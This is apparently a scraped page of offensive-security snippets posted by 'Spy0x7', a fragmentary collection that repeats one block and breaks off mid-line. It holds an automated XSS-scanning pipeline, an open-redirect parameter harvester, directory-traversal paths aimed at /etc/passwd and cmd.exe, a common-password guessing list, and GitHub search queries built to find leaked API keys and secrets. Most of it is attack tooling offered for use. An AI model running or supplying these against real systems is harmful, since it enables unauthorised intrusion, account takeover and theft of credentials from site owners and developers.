Spy0x7

#cat targets_urls.txt                
http://public-firing-range.appspot.com

Command Line

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt

• https://github.com/jaeles-project/gospider

Spy0x7

redUrl() {  gau -subs $1 | grep "redirect" >> $1_redirectall.txt |  gau -subs $1 | grep "redirect=" >> $1_redirectequal.txt |  gau -subs $1 | grep "url" >> $1_urlall.txt |  gau -subs $1 | grep "url=" >> $1_urlequal.txt |  gau -subs $1 | grep "next=" >> $1_next.txt |  gau -subs $1 | grep "dest=" >> $1_dest.txt |  gau -subs $1 | grep "destination" >> $1_destination.txt |  gau -subs $1 | grep "return" >> $1_return.txt |  gau -subs $1 | grep "go=" >> $1_go.txt |  gau -subs $1 | grep "redirect_uri" >> $1_redirecturi.txt |  gau -subs $1 | grep "continue=" >> $1_continue.txt |  gau -subs $1 | grep "return_path=" >> $1_path.txt |  gau -subs $1 | grep "externalLink=" >> $1_link.txt |  gau -subs $1 | grep "URL=" >> $1_URL.txt 
}

Spy0x7

 _____ _          _   _          __   _______ _____   _____ _                _       _               _   
|  __ \ |        | | | |         \ \ / /  ___/  ___| /  __ \ |              | |     | |             | |  
| |  \/ |__   ___| |_| |_  ___    \ V /\ `--.\ `--.  | /  \/ |__   ___  __ _| |_ ___| |__   ___  ___| |_ 
| | __| '_ \ / _ \ __| __|/ _ \   /   \ `--. \`--. \ | |   | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
| |_\ \ | | |  __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | |  __/ (_| | |_\__ \ | | |  __/  __/ |_ 
 \____/_| |_|\___|\__|\__|\___/  \/   \|____/\____/   \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|
 
A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.
                                                                                                        
Simple character manipulations.  

Spy0x7

Basics Filters: 
1. City 
Example City:New Delhi. 

2. Country
Example: Country:INDIA

3. Port
Example:Ports: 8443, 8080, 8180 etc

Spy0x7

/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0

Spy0x7

/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0

Spy0x7

/
/.
/.*
/../../../../../../../../../../../
/../../../../../../../../../../../../boot.ini
/../../../../../../../../../../../../etc/passwd
/../../../../../../../winnt/system32/cmd.exe
/../../..//index.html
/../index.html
/.bzr/

Spy0x7

8.8.8.8
9.9.9.9
208.67.222.222
1.1.1.1
185.228.168.9
64.6.64.6
198.101.242.72
176.103.130.130
8.8.4.4
149.112.112.112

Spy0x7

Password123!
password123!
Password123
Password1234
Password12345
Boston2019!
Boston123
Boston1234
Boston12345!
welcome123

Spy0x7

https://github.com/search?q=\?AccessKeyId= OR _02ddd67d5586_key= OR 0HB_CODESIGN_GPG_PASS= OR 0HB_CODESIGN_KEY_PASS=&s=indexed&type=Code
https://github.com/search?q=0VIRUSTOTAL_APIKEY= OR ACCESS KEY ID   = OR ACCESS_KEY_ID= OR ACCESS_KEY_SECRET= OR ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=ACCESS_SECRET= OR ACCESSKEY= OR ACCESSKEYID= OR ADZERK_API_KEY= OR ALGOLIA_ADMIN_KEY_1=&s=indexed&type=Code
https://github.com/search?q=ALGOLIA_ADMIN_KEY_2= OR ALGOLIA_ADMIN_KEY_MCM= OR ALGOLIA_API_KEY_MCM= OR ALGOLIA_API_KEY_SEARCH=&s=indexed&type=Code
https://github.com/search?q=ALGOLIA_API_KEY= OR ALGOLIA_SEARCH_API_KEY= OR ALGOLIA_SEARCH_KEY_1= OR ALGOLIA_SEARCH_KEY=&s=indexed&type=Code
https://github.com/search?q=ALIAS_PASS= OR ALICLOUD_ACCESS_KEY= OR ALICLOUD_SECRET_KEY= OR AMAZON_SECRET_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=ANSIBLE_VAULT_PASSWORD= OR aos_key= OR API_KEY_MCM= OR API_KEY_SECRET= OR API_KEY_SID= OR API_KEY=&s=indexed&type=Code
https://github.com/search?q=API_SECRE